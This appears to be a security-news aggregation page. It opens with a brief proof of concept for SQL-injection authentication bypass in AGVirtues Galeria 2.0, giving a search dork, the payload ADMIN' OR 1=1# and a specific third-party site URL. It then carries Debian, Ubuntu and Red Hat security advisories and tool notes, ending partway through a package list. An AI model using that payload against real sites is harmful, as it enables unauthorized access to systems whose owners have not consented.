AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : AGVirtues Galeria v2.0 Auth By Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : galeria/album.php?id=                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass : ADMIN' OR 1=1#[+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AGVirtues Galeria 2.0 SQL Injection

Debian Linux Security Advisory 5448-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5448-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 05, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-2124 CVE-2023-2156 CVE-2023-2269 CVE-2023-3090  
                 CVE-2023-3212 CVE-2023-3268 CVE-2023-3269 CVE-2023-3390  
                 CVE-2023-31084 CVE-2023-32250 CVE-2023-32254 CVE-2023-35788

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2156

    It was discovered that the IPv6 RPL protocol implementation in the  
    Linux kernel did not properly handled user-supplied data, resulting  
    in a triggerable assertion. An unauthenticated remote attacker can  
    take advantage of this flaw for denial of service.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3269

    Ruihan Li discovered that incorrect lock handling for accessing and  
    updating virtual memory areas (VMAs) may result in privilege  
    escalation.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-31084

    It was discovered that the DVB Core driver does not properly handle  
    locking of certain events, allowing a local user to cause a denial  
    of service.

CVE-2023-32250 / CVE-2023-32254

    Quentin Minster discovered two race conditions in KSMBD, a kernel  
    server which implements the SMB3 protocol, which could result in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-35788

    Hangyu Hua discovered an out-of-bounds write vulnerability in the  
    Flower classifier which may result in denial of service or the  
    execution of arbitrary code.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.37-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSlxzBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TqhA//aamUmnSElduaBWsCIn+Bbz1QeZgUqeAtdLVyAR8DHhWOW5CQtaIYAGCN  
bH8zYl4DULQNoWccNJKAB6mmh+eLK74L4W9Kkd4C3HL2g2CACDijoO79BlOE35VW  
33/S+bhg5gzC1qyv5A6HKt9QltyIA6cI9B+WPPG+uA79T/+12mWI7XbGUYiOaNeR  
WgOFK8iOhg7KemZqUFsbsG4qRGN0fzGHsU8KOLmF83hP6ObbPZKvVIdRHm0z7ff1  
Xba6El+i75LRx0Fqv6tQ3pZE43blXJZIlesUw1M44U493FINmUNTpPAkbJPlHbOb  
zBC61YcNiPhzyDu2bux+fyoNIfZxh4u9THm8SqWz5mejIFcjGgA9tNsQE3o9c1q/  
bZ/QyWoYYOCNBUeLTfOOHuTLlxK7HslTIp4A7J2uLrUiTrmPXldXmIl0FsFc4l+8  
qkBaZ+p58XbB7K02VIkr39gFx90GbF+Na0AaUoPGPyQBLz0X87uY6FyOCBY/SbyU  
3ARTQT4O55jX+zgK7cUasrS/jVIDEczMIWkf0yHbL4a6ihiNc2Isc1s0gjTF26ji  
AAE3BdIXi/V+CU4pHX8uq9BVwrDT0rm5BLgLJEo7n/oAWg6Tiq77TGOovQ1mgqF1  
TTCY/41xmwkD9UflCu5gdq7jyIqDKPBxjemTZuMhoztQXL9D9tI=MBf4  
-----END PGP SIGNATURE-----

Debian Security Advisory 5448-1

Debian Linux Security Advisory 5447-1 - Multiple security issues were discovered in MediaWiki, a website engine for collaborative work, which could result in cross-site scripting, a bypass of vandalism protections or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5447-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 05, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : CVE-2023-29141 CVE-2023-36674 CVE-2023-36675Debian Bug     : 1039075Multiple security issues were discovered in MediaWiki, a website enginefor collaborative work, which could result in cross-site scripting, abypass of vandalism protections or information disclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 1:1.35.11-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 1:1.39.4-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSlqxIACgkQEMKTtsN8TjbJRBAAodt+4EzI/HLq3hr2OU6K3WE6W2ThrPSMNev0TLyCTw7GeX4avi3cKjNLwqdPWGE4BjC6YAb5qU6Z9rqL00megvqihL5kaf010++jXk1/9uruENkOSj+KJuWtqLIvX3MYH4EU5gLRD6we8+LzTJQX46UNXtUVSQ7ixZNegzWGbZ8usI046x3YwAHVMTf5tn3M/XBKdhd9UcvffB+qM4Dkyyr1+/tJXyIzxYq8RbHDFW8ggvKZTJ1xSXVY4G0G4k+kQEvWtyUvIzypj5hdAI2zzSUXstFKl64dMwS35hXq8HrORJZwYVTgmLw56D346wYr5SelP++NO5Ap+nGmjc4bn3UxAMnc6EvCKC5L9nO8dYviMMe7EyLqyKhdrPXJXV0c+Yxznn3SRh9iRoVXwkfEmE+JT562qvk3ozu548AH8NzRaCEdv7DzuxhgBSrZMbOozDTmMiEUbe7beKfhSwo8tpRqlVlcA4Pk+v2TnEE6sQN6+gwrLaOyv7N9zwlofFHrjMyR68oFyNg9+cWhuLpca+NUjJE1mzk7V+2ehh1bH83YNAeStYqYqgK1oJcKNS/xVhCOm246TOwCROw5FwO7oZTYy44BUXrMZh+t/Srf2ko7lsYlPLWoz8t0gfZ47YMraeNoiewkq7Ij8RvhL/ZKOlB45MHlWewh0KR97HwItOE=1rTe-----END PGP SIGNATURE-----

Debian Security Advisory 5447-1

Ubuntu Security Notice 6204-1 - Seth Arnold discovered that CPDB incorrectly handled certain characters. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6204-1  
July 05, 2023

cpdb-libs vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

CPDB could be made to crash or execute arbitrary code.

Software Description:  
- cpdb-libs: Common Print Dialog Backends - Tools

Details:

Seth Arnold discovered that CPDB incorrectly handled certain characters.  
An attacker could possibly use this issue to cause a crash or execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  cpdb-libs-tools                 2.0~b4-0ubuntu2.1  
  libcpdb-frontend2               2.0~b4-0ubuntu2.1  
  libcpdb-libs-tools              2.0~b4-0ubuntu2.1  
  libcpdb2                        2.0~b4-0ubuntu2.1

Ubuntu 22.10:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.10.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.10.1

Ubuntu 22.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu8.1.22.04.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu8.1.22.04.1

Ubuntu 20.04 LTS:  
  libcpdb-libs-common1            1.2.0-0ubuntu7.1  
  libcpdb-libs-frontend1          1.2.0-0ubuntu7.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6204-1  
  CVE-2023-34095

Package Information:  
  https://launchpad.net/ubuntu/+source/cpdb-libs/2.0~b4-0ubuntu2.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.10.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu8.1.22.04.1  
  https://launchpad.net/ubuntu/+source/cpdb-libs/1.2.0-0ubuntu7.1

Ubuntu Security Notice USN-6204-1

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities.

Zeek 6.0.0

Capstone is a multi-architecture, multi-platform disassembly framework. It has a simple and lightweight architecture-neutral API, thread-safe by design, provides details on disassembled instruction, and more.

Capstone 5.0

Red Hat Security Advisory 2023-3915-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.44.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.44 bug fix and security update  
Advisory ID:       RHSA-2023:3915-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3915  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-2879 CVE-2022-2880 CVE-2022-2995   
                   CVE-2022-27664 CVE-2022-32149 CVE-2022-32190   
                   CVE-2022-41715 CVE-2023-1370 CVE-2023-3089   
                   CVE-2023-24329 CVE-2023-24540 CVE-2023-32067   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.44 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.44. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3914

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Security Fix(es):  
* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* openshift: OCP does not use FIPS-certified cryptography (CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

    The sha values for the release are

    (For x86_64 architecture)  
The image digest is  
sha256:52cbfbbeb9cc03b49c2788ac7333e63d3dae14673e01a9d8e59270f3a8390ed3

    (For s390x architecture)  
The image digest is  
sha256:8e25fe8123b744a1e7ae48b1d02cb989387168c6bc3eef8a47ee7ee13157c25f

    (For ppc64le architecture)  
The image digest is  
sha256:9d9ee02572038ccc4750e416c2acb4a222bfc4fcca63a3595ff63685304d0e53

    (For aarch64 architecture)  
The image digest is  
sha256:e26acde99c69074890e2eefc4ca89506e3dd7426c049a7ff02734cabfa3be42a

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-14004 - "pipelines-as-code-pipelinerun-go" configMap is not been used for the Go repository   
OCPBUGS-14355 - [4.11.z] [GCP] worker node with Sriov operator installed fails to come up online after reboot  
OCPBUGS-14413 - "Create" button inactive when creating application with "Import from Git" workflow  
OCPBUGS-14456 - CRL configmap is limited by 1MB max, not allowing for multiple public CRLS. (4.11)  
OCPBUGS-14457 - mtls CRL not working when using an intermediate CA (4.11)  
OCPBUGS-14654 - [4.11] IPI redfish installation fails on inspect for EthernetInterfaces  
OCPBUGS-14686 - Package openvswitch2.17 conflicts with openvswitch2.15 during the 4.12 to 4.13 upgrade of RHEL worker  
OCPBUGS-14746 - container_network* metrics stop reporting after container restart  
OCPBUGS-14931 - kuryr-controller crashes on KuryrPort cleanup when subport is already gone: Request requires an ID but none was found  
OCPBUGS-15150 - TestNewApp unit tests in oc are failing  
OCPBUGS-15151 - e2e-agnostic-ovn-cmd is permanently failing due to registry.centos.org  
OCPBUGS-15361 - Bump to kubernetes 1.24.15  
OCPBUGS-4812 -  oc new-app command using s2i with private Github repo (over SSH) fails using oc v4.10

6. References:

https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-2995  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-32149  
https://access.redhat.com/security/cve/CVE-2022-32190  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2023-1370  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpj2NAAoJENzjgjWX9erEfG8P/05BRiaqdCD1dgYerHwb64ms  
O9YCegBzmBdVkjzSCRiTU/x/Mn5PP69KMjMuxwusL1NKsp5eh8Z3hUtHCQUyOsyE  
zvQnO+ktOs0QYI7tzGd3Nj22o3xpJnXXbr+dGA+M97IXBA0Zb4xz3BlF11ahdPnR  
7jz1dhd3KBds/w/ebbtHdQspoyAWCRhB+/Mtz6bamJg4sGiqETlPsPD5Vp9+RgHC  
SFKc8+uPuGJy2vTdeo9O3rITFCbggT21zli7A9eGlS2/LgV+B/NbK7fdNzHsiHIg  
Xy4Dl6KFpGwuKjYsblsNNnViSmSRarJ4IurU4DzLeNyBFAoWpmdGjiOV3jM+9BYZ  
gKV3yzM5xkm9o1J3RC+b/TPZeWYHZn/OHdf7gfS1LmMmw48CV2sFWZb18w6U1kM3  
wvOEffOGIMoQLc3fTJ81nen44WrWUNRdUgOk6QQDiZh1LvhP7Oip9L5abSaufzKP  
lK1JP2M/Rf0chImpV6FhkVRcEpeg8mG1MyQDxdhCRJPAraF6UnxnsETIemII2Z3O  
VJe5/kB8gpZ/4GmLodoffidIeQqExcrQ5p4qM5pd7t2FiHOQ3D6RLpdm+zQfc2wC  
x44L9J7rlqI/sIBQ4JQ96Vx/COeimXGeUezFIhKroQALKBxEUBroCe3UcwjwzM6g  
MPz/sm7kFJXSbvGqi67w  
=AIL0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3915-01

Red Hat Security Advisory 2023-3914-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.11.44.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Enterprise security update  
Advisory ID:       RHSA-2023:3914-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3914  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-23772 CVE-2022-24675 CVE-2022-28327   
                   CVE-2022-30629 CVE-2022-41717 CVE-2023-3089   
                   CVE-2023-24540   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.44 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.11 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.11.44. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:3915

Security Fix(es):

* openshift: OCP & FIPS mode (CVE-2023-3089)

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: math/big: uncontrolled memory consumption due to an unhandled  
overflow via Rat.SetString (CVE-2022-23772)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: net/http: excessive memory growth in a Go server accepting HTTP/2  
requests (CVE-2022-41717)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2161274 - CVE-2022-41717 golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

6. Package List:

Red Hat OpenShift Container Platform 4.11:

Source:  
buildah-1.23.4-3.rhaos4.11.el8.src.rpm  
conmon-2.1.2-3.rhaos4.11.el8.src.rpm  
containernetworking-plugins-1.0.1-6.rhaos4.11.el8.src.rpm  
cri-o-1.24.6-2.rhaos4.11.git4bfe15a.el8.src.rpm  
openshift-4.11.0-202306260054.p0.g990d55b.assembly.stream.el8.src.rpm  
openshift-ansible-4.11.0-202306230041.p0.g0a466d7.assembly.stream.el8.src.rpm  
openshift-clients-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.src.rpm  
openshift-kuryr-4.11.0-202306280915.p0.gc732699.assembly.stream.el8.src.rpm  
podman-4.0.2-7.rhaos4.11.el8.src.rpm  
runc-1.1.2-2.rhaos4.11.el8.src.rpm  
skopeo-1.5.2-4.rhaos4.11.el8.src.rpm

aarch64:  
buildah-1.23.4-3.rhaos4.11.el8.aarch64.rpm  
buildah-debuginfo-1.23.4-3.rhaos4.11.el8.aarch64.rpm  
buildah-debugsource-1.23.4-3.rhaos4.11.el8.aarch64.rpm  
buildah-tests-1.23.4-3.rhaos4.11.el8.aarch64.rpm  
buildah-tests-debuginfo-1.23.4-3.rhaos4.11.el8.aarch64.rpm  
conmon-2.1.2-3.rhaos4.11.el8.aarch64.rpm  
conmon-debuginfo-2.1.2-3.rhaos4.11.el8.aarch64.rpm  
conmon-debugsource-2.1.2-3.rhaos4.11.el8.aarch64.rpm  
containernetworking-plugins-1.0.1-6.rhaos4.11.el8.aarch64.rpm  
containernetworking-plugins-debuginfo-1.0.1-6.rhaos4.11.el8.aarch64.rpm  
containernetworking-plugins-debugsource-1.0.1-6.rhaos4.11.el8.aarch64.rpm  
cri-o-1.24.6-2.rhaos4.11.git4bfe15a.el8.aarch64.rpm  
cri-o-debuginfo-1.24.6-2.rhaos4.11.git4bfe15a.el8.aarch64.rpm  
cri-o-debugsource-1.24.6-2.rhaos4.11.git4bfe15a.el8.aarch64.rpm  
openshift-clients-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.aarch64.rpm  
openshift-hyperkube-4.11.0-202306260054.p0.g990d55b.assembly.stream.el8.aarch64.rpm  
podman-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-catatonit-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-catatonit-debuginfo-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-debuginfo-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-debugsource-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-gvproxy-debuginfo-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-plugins-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-plugins-debuginfo-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-remote-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-remote-debuginfo-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
podman-tests-4.0.2-7.rhaos4.11.el8.aarch64.rpm  
runc-1.1.2-2.rhaos4.11.el8.aarch64.rpm  
runc-debuginfo-1.1.2-2.rhaos4.11.el8.aarch64.rpm  
runc-debugsource-1.1.2-2.rhaos4.11.el8.aarch64.rpm  
skopeo-1.5.2-4.rhaos4.11.el8.aarch64.rpm  
skopeo-debuginfo-1.5.2-4.rhaos4.11.el8.aarch64.rpm  
skopeo-debugsource-1.5.2-4.rhaos4.11.el8.aarch64.rpm  
skopeo-tests-1.5.2-4.rhaos4.11.el8.aarch64.rpm

noarch:  
openshift-ansible-4.11.0-202306230041.p0.g0a466d7.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.11.0-202306230041.p0.g0a466d7.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.11.0-202306280915.p0.gc732699.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.11.0-202306280915.p0.gc732699.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.11.0-202306280915.p0.gc732699.assembly.stream.el8.noarch.rpm  
podman-docker-4.0.2-7.rhaos4.11.el8.noarch.rpm  
python3-kuryr-kubernetes-4.11.0-202306280915.p0.gc732699.assembly.stream.el8.noarch.rpm

ppc64le:  
buildah-1.23.4-3.rhaos4.11.el8.ppc64le.rpm  
buildah-debuginfo-1.23.4-3.rhaos4.11.el8.ppc64le.rpm  
buildah-debugsource-1.23.4-3.rhaos4.11.el8.ppc64le.rpm  
buildah-tests-1.23.4-3.rhaos4.11.el8.ppc64le.rpm  
buildah-tests-debuginfo-1.23.4-3.rhaos4.11.el8.ppc64le.rpm  
conmon-2.1.2-3.rhaos4.11.el8.ppc64le.rpm  
conmon-debuginfo-2.1.2-3.rhaos4.11.el8.ppc64le.rpm  
conmon-debugsource-2.1.2-3.rhaos4.11.el8.ppc64le.rpm  
containernetworking-plugins-1.0.1-6.rhaos4.11.el8.ppc64le.rpm  
containernetworking-plugins-debuginfo-1.0.1-6.rhaos4.11.el8.ppc64le.rpm  
containernetworking-plugins-debugsource-1.0.1-6.rhaos4.11.el8.ppc64le.rpm  
cri-o-1.24.6-2.rhaos4.11.git4bfe15a.el8.ppc64le.rpm  
cri-o-debuginfo-1.24.6-2.rhaos4.11.git4bfe15a.el8.ppc64le.rpm  
cri-o-debugsource-1.24.6-2.rhaos4.11.git4bfe15a.el8.ppc64le.rpm  
openshift-clients-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.11.0-202306260054.p0.g990d55b.assembly.stream.el8.ppc64le.rpm  
podman-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-catatonit-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-catatonit-debuginfo-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-debuginfo-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-debugsource-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-gvproxy-debuginfo-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-plugins-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-plugins-debuginfo-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-remote-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-remote-debuginfo-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
podman-tests-4.0.2-7.rhaos4.11.el8.ppc64le.rpm  
runc-1.1.2-2.rhaos4.11.el8.ppc64le.rpm  
runc-debuginfo-1.1.2-2.rhaos4.11.el8.ppc64le.rpm  
runc-debugsource-1.1.2-2.rhaos4.11.el8.ppc64le.rpm  
skopeo-1.5.2-4.rhaos4.11.el8.ppc64le.rpm  
skopeo-debuginfo-1.5.2-4.rhaos4.11.el8.ppc64le.rpm  
skopeo-debugsource-1.5.2-4.rhaos4.11.el8.ppc64le.rpm  
skopeo-tests-1.5.2-4.rhaos4.11.el8.ppc64le.rpm

s390x:  
buildah-1.23.4-3.rhaos4.11.el8.s390x.rpm  
buildah-debuginfo-1.23.4-3.rhaos4.11.el8.s390x.rpm  
buildah-debugsource-1.23.4-3.rhaos4.11.el8.s390x.rpm  
buildah-tests-1.23.4-3.rhaos4.11.el8.s390x.rpm  
buildah-tests-debuginfo-1.23.4-3.rhaos4.11.el8.s390x.rpm  
conmon-2.1.2-3.rhaos4.11.el8.s390x.rpm  
conmon-debuginfo-2.1.2-3.rhaos4.11.el8.s390x.rpm  
conmon-debugsource-2.1.2-3.rhaos4.11.el8.s390x.rpm  
containernetworking-plugins-1.0.1-6.rhaos4.11.el8.s390x.rpm  
containernetworking-plugins-debuginfo-1.0.1-6.rhaos4.11.el8.s390x.rpm  
containernetworking-plugins-debugsource-1.0.1-6.rhaos4.11.el8.s390x.rpm  
cri-o-1.24.6-2.rhaos4.11.git4bfe15a.el8.s390x.rpm  
cri-o-debuginfo-1.24.6-2.rhaos4.11.git4bfe15a.el8.s390x.rpm  
cri-o-debugsource-1.24.6-2.rhaos4.11.git4bfe15a.el8.s390x.rpm  
openshift-clients-4.11.0-202306231116.p0.g2ae2303.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.11.0-202306260054.p0.g990d55b.assembly.stream.el8.s390x.rpm  
podman-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-catatonit-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-catatonit-debuginfo-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-debuginfo-4.0.2-7.rhaos4.11.el8.s390x.rpm  
podman-debugsource-4.0.2-7.rhaos4.11.el8.s390x.rpm  
